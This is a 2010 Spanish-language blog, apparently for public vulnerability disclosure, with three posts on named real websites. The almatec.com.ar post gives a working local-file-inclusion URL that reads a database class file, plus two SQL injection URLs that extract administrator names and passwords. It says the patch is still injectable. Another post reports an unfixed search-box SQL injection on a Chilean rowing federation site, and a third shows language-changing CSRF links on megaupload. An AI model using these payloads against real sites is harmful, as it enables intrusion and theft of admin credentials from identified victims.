janito24

Vulnerabilidad www.almatec.com.ar

In Uncategorized on septiembre 25, 2010 at 8:32 pm

Sitio web: www.almatec.com.ar
Descubridor: Ari-Slash
URL del aviso:
Fecha de descubrimiento: 20 Enero 2010
Fecha de notificación: 20 de Enero 2010
Fecha de publicación: 25 de septiembre 2010
Arreglado: Si, pero ahora da lugar a un SQLI
Vulnerabilidad: LFI y SQLIInformacion adicional: el arreglo consistio en dar un id unico a cada archivo que se subia, de la forma download.php?id=
pero esa solucion dio lugar a sqli, siempre tomando el 2 campo del select debido a que debian retornarse cierta cantidad de columnas.

LFI (reparado):
www.almatec.com.ar/download.php?file=admin/includes/Class.DB.php

SQLI:
http://almatec.com.ar/descargas2.php?id=4%20union%20select%20id,nombre,password,4%20from%20administrador%20where%20id=1;–
http://almatec.com.ar/descargas2.php?id=4%20union%20select%20id,password,nombre,4%20from%20administrador%20where%20id=1;–

Anuncios

Federacion Chilena del Remo

In Uncategorized on septiembre 20, 2010 at 4:05 pm

Sitio web: http://www.federacionchilenaderemo.cl
Descubridor: Ari-Slash
URL del aviso: esta misma pagina xD
Fecha de descubrimiento: 20 de septiembre 2010
Fecha de notificación: 20 de septiembre 2010
Fecha de publicación: 20 de septiembre 2010
Arreglado: No
Vulnerabilidad: SQLI en el buscador

CSRF www.megaupload.com

In Uncategorized on febrero 19, 2010 at 4:59 am

Sitio web: http://www.megaupload.ccom
Descubridor: janito24
Fecha de descubrimiento: 19 de febrero 2010
Fecha de notificación: 19 de febrero 2010
Fecha de publicación: 19 de febrero 2010
Arreglado: No
Información adicional: CSRF (Cambio de idioma arbitrario)

http://megaupload.com/?setlang=es a español
http://megaupload.com/?c=contact&setlang=de a aleman
http://www.megaupload.com/?d=9450P71D&setlang=fr a frances

NOTA: "TODAS" las urls de megaupload son vulnerables, por lo tanto desde cualquier parte pueden cambiar el idioma a quien quieran con tan solo mandarle el link